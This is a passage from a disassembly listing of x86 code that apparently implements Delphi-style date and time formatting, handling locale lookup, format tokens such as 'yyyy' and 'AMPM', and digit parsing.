; sub_40009414+9E�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000957D
loc_40009562: ; CODE XREF: sub_40009414+167�j
lea eax, [ebp+var_11C]
call sub_40004884
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40009576: ; DATA XREF: sub_40009414+1D�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40009562
; ---------------------------------------------------------------------------
loc_4000957D: ; CODE XREF: sub_40009414+161�j
; DATA XREF: sub_40009414+149�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40009414 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 2
dword_4000958C dd 6767h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40009590 proc near ; CODE XREF: sub_400096A8+1F6�p
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_E = word ptr -0Eh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFEE8h
push ebx
push esi
xor ecx, ecx
mov [ebp+var_4], ecx
mov ebx, edx
mov esi, eax
xor eax, eax
push ebp
push offset loc_4000967E
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, ebx
call sub_40004884
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax-0Eh]
mov [ebp+var_14], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax-10h]
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax-12h]
mov [ebp+var_E], ax
cmp esi, 2
jg short loc_400095EE
lea eax, [ebp+var_4]
mov edx, offset dword_40009694
call sub_4000491C
jmp short loc_400095FB
; ---------------------------------------------------------------------------
loc_400095EE: ; CODE XREF: sub_40009590+4D�j
lea eax, [ebp+var_4]
mov edx, offset aYyyy ; "yyyy"
call sub_4000491C
loc_400095FB: ; CODE XREF: sub_40009590+5C�j
push 100h
lea eax, [ebp+var_114]
push eax
mov eax, [ebp+var_4]
call sub_40004D48
push eax
lea eax, [ebp+var_14]
push eax
push 4
call sub_400065C8 ; GetThreadLocale
push eax
call sub_40006568 ; GetDateFormatA
test eax, eax
jz short loc_40009668
mov eax, ebx
lea edx, [ebp+var_114]
mov ecx, 100h
call sub_40004AF4
dec esi
jnz short loc_40009668
mov eax, [ebx]
cmp byte ptr [eax], 30h
jnz short loc_40009668
mov eax, [ebx]
mov [ebp+var_118], eax
mov esi, [ebp+var_118]
test esi, esi
jz short loc_40009658
sub esi, 4
mov esi, [esi]
loc_40009658: ; CODE XREF: sub_40009590+C1�j
push ebx
mov ecx, esi
dec ecx
mov eax, [ebx]
mov edx, 2
call sub_40004DA8
loc_40009668: ; CODE XREF: sub_40009590+93�j
; sub_40009590+A8�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40009685
loc_40009675: ; CODE XREF: sub_40009590+F3�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000967E: ; DATA XREF: sub_40009590+17�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40009675
; ---------------------------------------------------------------------------
loc_40009685: ; CODE XREF: sub_40009590+ED�j
; DATA XREF: sub_40009590+E0�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40009590 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 2
dword_40009694 dd 7979h, 0FFFFFFFFh, 4aYyyy db 'yyyy',0 ; DATA XREF: sub_40009590+61�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400096A8 proc near ; CODE XREF: sub_400096A8+2FD�p
; sub_400096A8+311�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFD4h
push ebx
push esi
push edi
xor edx, edx
mov [ebp+var_2C], edx
mov [ebp+var_28], edx
mov [ebp+var_4], eax
lea edi, [ebp+var_4]
xor eax, eax
push ebp
push offset loc_40009E2C
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp dword ptr [edi], 0
jz loc_40009E11
mov eax, [ebp+arg_0]
cmp dword ptr [eax-108h], 2
jge loc_40009E11
mov eax, [ebp+arg_0]
inc dword ptr [eax-108h]
mov [ebp+var_1E], 20h
mov [ebp+var_13], 0
mov [ebp+var_1D], 0
mov [ebp+var_1F], 0
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009704: ; CODE XREF: sub_400096A8+75A�j
mov eax, [edi]
movzx eax, byte ptr [eax]
mov [ebp+var_5], al
movzx eax, [ebp+var_5]
movzx eax, al
bt dword_4001A82C, eax
jnb short loc_40009743
mov eax, [ebp+arg_0]
push eax
mov eax, [edi]
call sub_4000BB60
mov edx, eax
mov eax, [edi]
call sub_400092C4
pop ecx
mov eax, [edi]
call sub_4000BB80
mov [edi], eax
mov [ebp+var_1E], 20h
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009743: ; CODE XREF: sub_400096A8+72�j
mov eax, [edi]
call sub_4000BB80
mov [edi], eax
movzx ebx, [ebp+var_5]
mov eax, ebx
add al, 9Fh
sub al, 1Ah
jnb short loc_4000975B
sub bl, 20h
loc_4000975B: ; CODE XREF: sub_400096A8+AE�j
mov eax, ebx
add al, 0BFh
sub al, 1Ah
jnb short loc_40009773
cmp bl, 4Dh
jnz short loc_40009770
cmp [ebp+var_1E], 48h
jnz short loc_40009770
mov bl, 4Eh
loc_40009770: ; CODE XREF: sub_400096A8+BE�j
; sub_400096A8+C4�j
mov [ebp+var_1E], bl
loc_40009773: ; CODE XREF: sub_400096A8+B9�j
movzx eax, bl
add eax, 0FFFFFFDEh
cmp eax, 38h ; switch 57 cases
ja loc_40009DEB ; default
; jumptable 40009789 cases 1-4,6-12,14-23,25-30,32,36,39-42,45-48,51-54
movzx eax, ds:byte_40009790[eax]
jmp ds:off_400097C9[eax*4] ; switch jump
; ---------------------------------------------------------------------------
byte_40009790 db 0Fh, 0, 0, 0 ; DATA XREF: sub_400096A8+DA�r
db 0, 0Fh, 0, 0 ; indirect table for switch statement
db 0, 0, 0, 0
db 0, 0Dh, 0, 0
db 0, 0, 0, 0
db 0, 0, 0, 0
db 0Eh, 0, 0, 0
db 0, 0, 0, 0Bh
db 0, 0Ch, 5, 3
db 0, 2, 6, 0
db 0, 0, 0, 4
db 7, 0, 0, 0
db 0, 8, 9, 0
db 0, 0, 0, 1
db 0Ah
off_400097C9 dd offset loc_40009DEB, offset loc_40009809, offset loc_40009858
; DATA XREF: sub_400096A8+E1�r
dd offset loc_40009885, offset loc_400098B2, offset loc_40009917 ; jump table for switch statement
dd offset loc_400099C4, offset loc_40009AC8, offset loc_40009AF9
dd offset loc_40009B2A, offset loc_40009B5F, offset loc_40009B90
dd offset loc_40009CFD, offset loc_40009D5B, offset loc_40009D7E
dd offset loc_40009D9D
; ---------------------------------------------------------------------------
loc_40009809: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
push ebp ; jumptable 40009789 case 55
call sub_40009370
pop ecx
push ebp
call sub_4000939C
pop ecx
cmp [ebp+var_C], 2
jg short loc_40009840
mov eax, [ebp+arg_0]
push eax
movzx eax, [ebp+var_E]
mov ecx, 64h
xor edx, edx
div ecx
mov eax, edx
mov edx, 2
call sub_40009324
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009840: ; CODE XREF: sub_400096A8+173�j
mov eax, [ebp+arg_0]
push eax
movzx eax, [ebp+var_E]
mov edx, 4
call sub_40009324
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009858: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
push ebp ; jumptable 40009789 case 37
call sub_40009370
pop ecx
push ebp
call sub_4000939C
pop ecx
mov eax, [ebp+arg_0]
push eax
push ebp
lea edx, [ebp+var_28]
mov eax, [ebp+var_C]
call sub_40009414
pop ecx
mov eax, [ebp+var_28]
call sub_40009308
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009885: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
push ebp ; jumptable 40009789 case 35
call sub_40009370
pop ecx
push ebp
call sub_4000939C
pop ecx
mov eax, [ebp+arg_0]
push eax
push ebp
lea edx, [ebp+var_2C]
mov eax, [ebp+var_C]
call sub_40009590
pop ecx
mov eax, [ebp+var_2C]
call sub_40009308
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_400098B2: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
push ebp ; jumptable 40009789 case 43
call sub_40009370
pop ecx
push ebp
call sub_4000939C
pop ecx
mov eax, [ebp+var_C]
dec eax
sub eax, 2
jb short loc_400098CD
jz short loc_400098E3
jmp short loc_400098FD
; ---------------------------------------------------------------------------
loc_400098CD: ; CODE XREF: sub_400096A8+21F�j
mov eax, [ebp+arg_0]
push eax
movzx eax, [ebp+var_10]
mov edx, [ebp+var_C]
call sub_40009324
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_400098E3: ; CODE XREF: sub_400096A8+221�j
mov eax, [ebp+arg_0]
push eax
movzx eax, [ebp+var_10]
mov eax, ds:dword_4001E82C[eax*4]
call sub_40009308
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_400098FD: ; CODE XREF: sub_400096A8+223�j
mov eax, [ebp+arg_0]
push eax
movzx eax, [ebp+var_10]
mov eax, ds:dword_4001E85C[eax*4]
call sub_40009308
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009917: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
push ebp ; jumptable 40009789 case 34
call sub_40009370
pop ecx
mov eax, [ebp+var_C]
dec eax
sub eax, 2
jb short loc_40009931
jz short loc_4000994E
dec eax
jz short loc_40009975
dec eax
jz short loc_4000999C
jmp short loc_400099B0
; ---------------------------------------------------------------------------
loc_40009931: ; CODE XREF: sub_400096A8+27D�j
push ebp
call sub_4000939C
pop ecx
mov eax, [ebp+arg_0]
push eax
movzx eax, [ebp+var_12]
mov edx, [ebp+var_C]
call sub_40009324
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_4000994E: ; CODE XREF: sub_400096A8+27F�j
mov eax, [ebp+arg_0]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0Ch]
push dword ptr [eax+8] ; double
call sub_40009288
movzx eax, ax
mov eax, ds:dword_4001E88C[eax*4]
call sub_40009308
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009975: ; CODE XREF: sub_400096A8+282�j
mov eax, [ebp+arg_0]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0Ch]
push dword ptr [eax+8] ; double
call sub_40009288
movzx eax, ax
mov eax, ds:dword_4001E8A8[eax*4]
call sub_40009308
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_4000999C: ; CODE XREF: sub_400096A8+285�j
mov eax, [ebp+arg_0]
push eax
mov eax, ds:dword_4001E814
call sub_400096A8
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_400099B0: ; CODE XREF: sub_400096A8+287�j
mov eax, [ebp+arg_0]
push eax
mov eax, ds:dword_4001E818
call sub_400096A8
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_400099C4: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
push ebp ; jumptable 40009789 case 38
call sub_40009370
pop ecx
push ebp
call sub_400093D4
pop ecx
mov [ebp+var_20], 0
mov esi, [edi]
jmp loc_40009A73
; ---------------------------------------------------------------------------
loc_400099DD: ; CODE XREF: sub_400096A8+3CE�j
movzx eax, byte ptr [esi]
movzx eax, al
bt dword_4001A82C, eax
jnb short loc_400099F7
mov eax, esi
call sub_4000BB80
mov esi, eax
jmp short loc_40009A73
; ---------------------------------------------------------------------------
loc_400099F7: ; CODE XREF: sub_400096A8+342�j
movzx eax, byte ptr [esi]
cmp eax, 48h
jg short loc_40009A12
jz short loc_40009A7C
sub eax, 22h
jz short loc_40009A69
sub eax, 5
jz short loc_40009A69
sub eax, 1Ah
jz short loc_40009A1E
jmp short loc_40009A72
; ---------------------------------------------------------------------------
loc_40009A12: ; CODE XREF: sub_400096A8+355�j
sub eax, 61h
jz short loc_40009A1E
sub eax, 7
jz short loc_40009A7C
jmp short loc_40009A72
; ---------------------------------------------------------------------------
loc_40009A1E: ; CODE XREF: sub_400096A8+366�j
; sub_400096A8+36D�j
cmp [ebp+var_20], 0
jnz short loc_40009A72
mov edx, offset dword_40009E3C
mov ecx, 5
mov eax, esi
call sub_400081E0
test eax, eax
jz short loc_40009A63
mov edx, offset dword_40009E44
mov ecx, 3
mov eax, esi
call sub_400081E0
test eax, eax
jz short loc_40009A63
mov edx, offset aAmpm ; "AMPM"
mov ecx, 4
mov eax, esi
call sub_400081E0
test eax, eax
jnz short loc_40009A7C
loc_40009A63: ; CODE XREF: sub_400096A8+38F�j
; sub_400096A8+3A4�j
mov [ebp+var_1F], 1
jmp short loc_40009A7C
; ---------------------------------------------------------------------------
loc_40009A69: ; CODE XREF: sub_400096A8+35C�j
; sub_400096A8+361�j
movzx eax, [ebp+var_20]
xor al, 1
mov [ebp+var_20], al
loc_40009A72: ; CODE XREF: sub_400096A8+368�j
; sub_400096A8+374�j ...
inc esi
loc_40009A73: ; CODE XREF: sub_400096A8+330�j
; sub_400096A8+34D�j
cmp byte ptr [esi], 0
jnz loc_400099DD
loc_40009A7C: ; CODE XREF: sub_400096A8+357�j
; sub_400096A8+372�j ...
movzx eax, [ebp+var_16]
mov [ebp+var_22], ax
cmp [ebp+var_1F], 0
jz short loc_40009AA5
cmp [ebp+var_22], 0
jnz short loc_40009A99
mov [ebp+var_22], 0Ch
jmp short loc_40009AA5
; ---------------------------------------------------------------------------
loc_40009A99: ; CODE XREF: sub_400096A8+3E7�j
cmp [ebp+var_22], 0Ch
jbe short loc_40009AA5
sub [ebp+var_22], 0Ch
loc_40009AA5: ; CODE XREF: sub_400096A8+3E0�j
; sub_400096A8+3EF�j ...
cmp [ebp+var_C], 2
jle short loc_40009AB2
mov [ebp+var_C], 2
loc_40009AB2: ; CODE XREF: sub_400096A8+401�j
mov eax, [ebp+arg_0]
push eax
movzx eax, [ebp+var_22]
mov edx, [ebp+var_C]
call sub_40009324
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009AC8: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
push ebp ; jumptable 40009789 case 44
call sub_40009370
pop ecx
push ebp
call sub_400093D4
pop ecx
cmp [ebp+var_C], 2
jle short loc_40009AE3
mov [ebp+var_C], 2
loc_40009AE3: ; CODE XREF: sub_400096A8+432�j
mov eax, [ebp+arg_0]
push eax
movzx eax, [ebp+var_18]
mov edx, [ebp+var_C]
call sub_40009324
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009AF9: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
push ebp ; jumptable 40009789 case 49
call sub_40009370
pop ecx
push ebp
call sub_400093D4
pop ecx
cmp [ebp+var_C], 2
jle short loc_40009B14
mov [ebp+var_C], 2
loc_40009B14: ; CODE XREF: sub_400096A8+463�j
mov eax, [ebp+arg_0]
push eax
movzx eax, [ebp+var_1A]
mov edx, [ebp+var_C]
call sub_40009324
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009B2A: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
push ebp ; jumptable 40009789 case 50
call sub_40009370
pop ecx
cmp [ebp+var_C], 1
jnz short loc_40009B4B
mov eax, [ebp+arg_0]
push eax
mov eax, ds:dword_4001E828
call sub_400096A8
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009B4B: ; CODE XREF: sub_400096A8+48D�j
mov eax, [ebp+arg_0]
push eax
mov eax, ds:dword_4001E82C
call sub_400096A8
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009B5F: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
push ebp ; jumptable 40009789 case 56
call sub_40009370
pop ecx
push ebp
call sub_400093D4
pop ecx
cmp [ebp+var_C], 3
jle short loc_40009B7A
mov [ebp+var_C], 3
loc_40009B7A: ; CODE XREF: sub_400096A8+4C9�j
mov eax, [ebp+arg_0]
push eax
movzx eax, [ebp+var_1C]
mov edx, [ebp+var_C]
call sub_40009324
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009B90: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
push ebp ; jumptable 40009789 case 31
call sub_400093D4
pop ecx
mov esi, [edi]
dec esi
mov edx, offset dword_40009E3C
mov ecx, 5
mov eax, esi
call sub_400081E0
test eax, eax
jnz short loc_40009BD6
cmp [ebp+var_16], 0Ch
jb short loc_40009BB9
add esi, 3
loc_40009BB9: ; CODE XREF: sub_400096A8+50C�j
mov eax, [ebp+arg_0]
push eax
mov edx, 2
mov eax, esi
call sub_400092C4
pop ecx
add dword ptr [edi], 4
mov [ebp+var_1F], 1
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009BD6: ; CODE XREF: sub_400096A8+505�j
mov edx, offset dword_40009E44
mov ecx, 3
mov eax, esi
call sub_400081E0
test eax, eax
jnz short loc_40009C12
cmp [ebp+var_16], 0Ch
jb short loc_40009BF5
add esi, 2
loc_40009BF5: ; CODE XREF: sub_400096A8+548�j
mov eax, [ebp+arg_0]
push eax
mov edx, 1
mov eax, esi
call sub_400092C4
pop ecx
add dword ptr [edi], 2
mov [ebp+var_1F], 1
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009C12: ; CODE XREF: sub_400096A8+541�j
mov edx, offset aAmpm ; "AMPM"
mov ecx, 4
mov eax, esi
call sub_400081E0
test eax, eax
jnz short loc_40009C5A
cmp [ebp+var_16], 0Ch
jnb short loc_40009C3F
mov eax, [ebp+arg_0]
push eax
mov eax, ds:dword_4001E820
call sub_40009308
pop ecx
jmp short loc_40009C4E
; ---------------------------------------------------------------------------
loc_40009C3F: ; CODE XREF: sub_400096A8+584�j
mov eax, [ebp+arg_0]
push eax
mov eax, ds:dword_4001E824
call sub_40009308
pop ecx
loc_40009C4E: ; CODE XREF: sub_400096A8+595�j
add dword ptr [edi], 3
mov [ebp+var_1F], 1
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009C5A: ; CODE XREF: sub_400096A8+57D�j
mov edx, offset aAaaa ; "AAAA"
mov ecx, 4
mov eax, esi
call sub_400081E0
test eax, eax
jnz short loc_40009CA0
push ebp
call sub_4000939C
pop ecx
mov eax, [ebp+arg_0]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0Ch]
push dword ptr [eax+8] ; double
call sub_40009288
movzx eax, ax
mov eax, ds:dword_4001E8A8[eax*4]
call sub_40009308
pop ecx
add dword ptr [edi], 3
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009CA0: ; CODE XREF: sub_400096A8+5C5�j
mov edx, offset aAaa ; "AAA"
mov ecx, 3
mov eax, esi
call sub_400081E0
test eax, eax
jnz short loc_40009CE6
push ebp
call sub_4000939C
pop ecx
mov eax, [ebp+arg_0]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0Ch]
push dword ptr [eax+8] ; double
call sub_40009288
movzx eax, ax
mov eax, ds:dword_4001E88C[eax*4]
call sub_40009308
pop ecx
add dword ptr [edi], 2
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009CE6: ; CODE XREF: sub_400096A8+60B�j
mov eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_5]
mov edx, 1
call sub_400092C4
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009CFD: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
push ebp ; jumptable 40009789 case 33
call sub_40009370
pop ecx
mov eax, [ebp+arg_0]
push eax
mov eax, ds:dword_4001E814
call sub_400096A8
pop ecx
push ebp
call sub_400093D4
pop ecx
cmp [ebp+var_16], 0
jnz short loc_40009D33
cmp [ebp+var_18], 0
jnz short loc_40009D33
cmp [ebp+var_1A], 0
jz loc_40009DFD
loc_40009D33: ; CODE XREF: sub_400096A8+677�j
; sub_400096A8+67E�j
mov eax, [ebp+arg_0]
push eax
mov eax, offset asc_40009E5C ; " "
mov edx, 1
call sub_400092C4
pop ecx
mov eax, [ebp+arg_0]
push eax
mov eax, ds:dword_4001E82C
call sub_400096A8
pop ecx
jmp loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009D5B: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
cmp ds:byte_4001E811, 0 ; jumptable 40009789 case 13
jz loc_40009DFD
mov eax, [ebp+arg_0]
push eax
mov eax, offset byte_4001E811
mov edx, 1
call sub_400092C4
pop ecx
jmp short loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009D7E: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
cmp ds:byte_4001E81C, 0 ; jumptable 40009789 case 24
jz short loc_40009DFD
mov eax, [ebp+arg_0]
push eax
mov eax, offset byte_4001E81C
mov edx, 1
call sub_400092C4
pop ecx
jmp short loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009D9D: ; CODE XREF: sub_400096A8+E1�j
; DATA XREF: sub_400096A8:off_400097C9�o
mov esi, [edi] ; jumptable 40009789 cases 0,5
jmp short loc_40009DBF
; ---------------------------------------------------------------------------
loc_40009DA1: ; CODE XREF: sub_400096A8+726�j
mov eax, [edi]
movzx eax, byte ptr [eax]
movzx eax, al
bt dword_4001A82C, eax
jnb short loc_40009DBD
mov eax, [edi]
call sub_4000BB80
mov [edi], eax
jmp short loc_40009DBF
; ---------------------------------------------------------------------------
loc_40009DBD: ; CODE XREF: sub_400096A8+708�j
inc dword ptr [edi]
loc_40009DBF: ; CODE XREF: sub_400096A8+6F7�j
; sub_400096A8+713�j
mov eax, [edi]
cmp byte ptr [eax], 0
jz short loc_40009DD0
mov eax, [edi]
movzx eax, byte ptr [eax]
cmp al, [ebp+var_5]
jnz short loc_40009DA1
loc_40009DD0: ; CODE XREF: sub_400096A8+71C�j
mov eax, [ebp+arg_0]
push eax
mov edx, [edi]
sub edx, esi
mov eax, esi
call sub_400092C4
pop ecx
mov eax, [edi]
cmp byte ptr [eax], 0
jz short loc_40009DFD
inc dword ptr [edi]
jmp short loc_40009DFD
; ---------------------------------------------------------------------------
loc_40009DEB: ; CODE XREF: sub_400096A8+D4�j
; sub_400096A8+E1�j
; DATA XREF: ...
mov eax, [ebp+arg_0] ; default
; jumptable 40009789 cases 1-4,6-12,14-23,25-30,32,36,39-42,45-48,51-54
push eax
lea eax, [ebp+var_5]
mov edx, 1
call sub_400092C4
pop ecx
loc_40009DFD: ; CODE XREF: sub_400096A8+57�j
; sub_400096A8+96�j ...
mov eax, [edi]
cmp byte ptr [eax], 0
jnz loc_40009704
mov eax, [ebp+arg_0]
dec dword ptr [eax-108h]
loc_40009E11: ; CODE XREF: sub_400096A8+28�j
; sub_400096A8+38�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40009E33
loc_40009E1E: ; CODE XREF: sub_400096A8+789�j
lea eax, [ebp+var_2C]
mov edx, 2
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_40009E2C: ; DATA XREF: sub_400096A8+1A�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40009E1E
; ---------------------------------------------------------------------------
loc_40009E33: ; CODE XREF: sub_400096A8+783�j
; DATA XREF: sub_400096A8+771�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_400096A8 endp
; ---------------------------------------------------------------------------
align 4
dword_40009E3C dd 502F4D41h, 4Dh ; sub_400096A8+4F2�o
dword_40009E44 dd 502F41h ; sub_400096A8:loc_40009BD6�o
aAmpm db 'AMPM',0 ; DATA XREF: sub_400096A8+3A6�o
; sub_400096A8:loc_40009C12�o
align 10h
aAaaa db 'AAAA',0 ; DATA XREF: sub_400096A8:loc_40009C5A�o
align 4
aAaa db 'AAA',0 ; DATA XREF: sub_400096A8:loc_40009CA0�o
asc_40009E5C: ; DATA XREF: sub_400096A8+68F�o
unicode 0, < >,0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40009E60 proc near ; CODE XREF: sub_4000D158+3A�p
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = byte ptr -100h
push ebp
mov ebp, esp
add esp, 0FFFFFEF8h
push ebx
push esi
mov ebx, edx
mov esi, eax
xor eax, eax
mov [ebp+var_104], eax
xor eax, eax
mov [ebp+var_108], eax
test ebx, ebx
jz short loc_40009E8E
push ebp
mov eax, ebx
call sub_400096A8
pop ecx
jmp short loc_40009E9A
; ---------------------------------------------------------------------------
loc_40009E8E: ; CODE XREF: sub_40009E60+21�j
push ebp
mov eax, offset dword_40009EB8
call sub_400096A8
pop ecx
loc_40009E9A: ; CODE XREF: sub_40009E60+2C�j
lea edx, [ebp+var_100]
mov eax, esi
mov ecx, [ebp+var_104]
call sub_40004974
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_40009E60 endp
; ---------------------------------------------------------------------------
align 4
dword_40009EB8 dd 43h
; =============== S U B R O U T I N E =======================================
sub_40009EBC proc near ; CODE XREF: sub_40009EE0+20�p
; sub_40009F74+36�p ...
push ebx
push esi
push edi
mov edi, edx
mov esi, eax
mov ebx, [edi]
jmp short loc_40009EC8
; ---------------------------------------------------------------------------
loc_40009EC7: ; CODE XREF: sub_40009EBC+1C�j
inc ebx
loc_40009EC8: ; CODE XREF: sub_40009EBC+9�j
mov eax, esi
call sub_40004B44
cmp ebx, eax
jg short loc_40009EDA
cmp byte ptr [esi+ebx-1], 20h
jz short loc_40009EC7
loc_40009EDA: ; CODE XREF: sub_40009EBC+15�j
mov [edi], ebx
pop edi
pop esi
pop ebx
retn
sub_40009EBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40009EE0 proc near ; CODE XREF: sub_4000A1CC+B9�p
; sub_4000A1CC+E9�p ...
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov [ebp+var_8], ecx
mov [ebp+var_4], edx
mov edi, eax
mov [ebp+var_9], 0
mov eax, [ebp+arg_0]
mov byte ptr [eax], 0
mov edx, [ebp+var_4]
mov eax, edi
call sub_40009EBC
mov ebx, [ebp+var_4]
mov ebx, [ebx]
xor esi, esi
jmp short loc_40009F24
; ---------------------------------------------------------------------------
loc_40009F0E: ; CODE XREF: sub_40009EE0+5F�j
mov eax, esi
add eax, eax
lea eax, [eax+eax*4]
movzx edx, byte ptr [edi+ebx-1]
sub dx, 30h
add ax, dx
mov esi, eax
inc ebx
loc_40009F24: ; CODE XREF: sub_40009EE0+2C�j
mov eax, edi
call sub_40004B44
cmp ebx, eax
jg short loc_40009F41
movzx eax, byte ptr [edi+ebx-1]
add al, 0D0h
sub al, 0Ah
jnb short loc_40009F41
cmp si, 3E8h
jb short loc_40009F0E
loc_40009F41: ; CODE XREF: sub_40009EE0+4D�j
; sub_40009EE0+58�j
mov eax, [ebp+var_4]
cmp ebx, [eax]
jle short loc_40009F65
mov eax, ebx
mov edx, [ebp+var_4]
mov edx, [edx]
sub al, dl
mov edx, [ebp+arg_0]
mov [edx], al
mov eax, [ebp+var_4]
mov [eax], ebx
mov eax, [ebp+var_8]
mov [eax], si
mov [ebp+var_9], 1
loc_40009F65: ; CODE XREF: sub_40009EE0+66�j
movzx eax, [ebp+var_9]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_40009EE0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40009F74 proc near ; CODE XREF: sub_4000A518+1D�p
; sub_4000A518+2F�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_14], ebx
mov ebx, ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_4000A03A
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_9], 0
test ebx, ebx
jz loc_4000A024
mov edx, [ebp+var_8]
mov eax, [ebp+var_4]
call sub_40009EBC
mov esi, ebx
test esi, esi
jz short loc_40009FBA
sub esi, 4
mov esi, [esi]
